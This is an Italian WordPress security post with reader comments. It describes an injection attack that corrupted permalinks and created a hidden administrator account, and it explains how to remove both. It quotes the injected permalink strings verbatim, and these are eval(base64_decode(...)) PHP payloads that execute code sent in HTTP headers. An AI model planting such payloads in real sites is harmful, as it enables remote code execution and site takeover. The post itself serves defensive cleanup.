Molti siti vengono colpiti da un recente attacco SQL in cui codici vengono iniettati nel tuo sito. Questa iniezione MySQL influisce sui tuoi permalink rendendoli inefficaci. Di conseguenza, gli URL dei tuoi post del blog non funzioneranno. Numerosi blog di WordPress sono stati presi di mira in questo attacco, Grazie a Andy Soward per aver portato questo alla nostra attenzione.
C'era uno dei seguenti codici che sono stati aggiunti alla tua struttura dei permalink a causa di questo attacco:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Queste virgolette sono state aggiunte a tutti i permalink sul tuo sito e possono essere modificate solo se rimosse manualmente.
Per risolvere questo problema vai su:
Impostazioni > Permalink e rimuovi il codice sopra e sostituisci il tuo codice predefinito.
La prossima cosa che devi fare è andare su Utenti. Vedrai che c'è più di un amministratore. Non vedrai i loro nomi elencati, ma vedrai il conteggio aumentare. Quindi quello che devi fare è guardare tutti gli utenti e trovare l'ultimo che si è registrato. Passa il mouse sopra quell'utente e ottieni il link. Cambia il codice userid= aggiungendo 1 a quel numero. Quindi se l'ultimo utente che puoi vedere era l'utente n. 2, aggiungi 1 e rendilo 3. Dovresti trovare che l'admin nascosto ha un codice strano come nome. Elimina il codice e rendilo un abbonato. Quindi torna indietro e cancellalo.
Questo dovrebbe risolvere il problema. Puoi anche eliminarlo semplicemente andando su PHPMyAdmin. Perché vedrai l'utente lì.
Volevamo solo diffondere questa notizia il prima possibile, in modo che i nostri utenti possano essere aggiornati. Assicurati che il tuo blog non sia infetto. Speriamo che WordPress rilasci presto una versione.
Inoltre, se non hai implementato alcune di queste misure per proteggere la tua Area di amministrazione di WordPress.
ahmed_alaaedin
Il database del mio sito web è stato iniettato qualche giorno fa, aggiungendo alcuni strani caratteri e parole dopo ogni URL di post o pagina. Non ho trovato nulla di strano nelle impostazioni: permalink o nel menu utenti. Cosa fare per risolvere questo problema, per favore? La mia compagnia di hosting ha anche un backup del database infetto!
un utente di wordpress
sono stato colpito da questo due volte.
la prima volta è stata un'iniezione SQL del plugin wassup, questa volta non sono sicuro. il mio provider di hosting mi ha bloccato.
una volta ripristinato il mio account, rimuoverò wordpress.. Ne ho abbastanza!
Staff editoriale
Forse non è colpa di WordPress, forse la sicurezza del tuo hosting non è così buona...
Amministratore
Joey
Cosa hai scoperto con questo? Sono appena stato colpito dallo stesso problema. Tutti i miei siti WP sul mio account stanno subendo lo stesso problema.
lerrkin
Ciao.
Interessante URL https://014.leahstevensyj.workers.dev/wp-tutorials/11-vital-tips-and-hacks-to-protect-your-wordpress-admin-area/ collegato da qui mostra una pagina bianca.
Code contains this comment: ‘‘.
That’s WP Super Cache’s bug http://wordpress.org/support/topic/315446, and it seems present here… So update WP Super Cache, please. I hope read that tips soon
Staff editoriale
Apprezziamo molto questo commento, il problema non era con WP Super Cache, crediamo fosse il plugin chiamato WP External Link. Abbiamo disinstallato e reinstallato WP-Super Cache due volte, ma poi abbiamo confrontato il server di sviluppo dove tutto funzionava bene. La differenza era questo plugin. Quando abbiamo rimosso quel plugin ha funzionato. Ora puoi leggere quel post.
Amministratore
lerrkin
Maybe that was WP External Link and Super Cache conflict…
Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
I see my pasted WP-Super-Cache html comment above works as html comment and is invisible
So last Super Cache ver. promises to do not html validity check.
Oh, sto leggendo!
Grazie mille!
Roseli A. Bakar
Thanks for highlighting this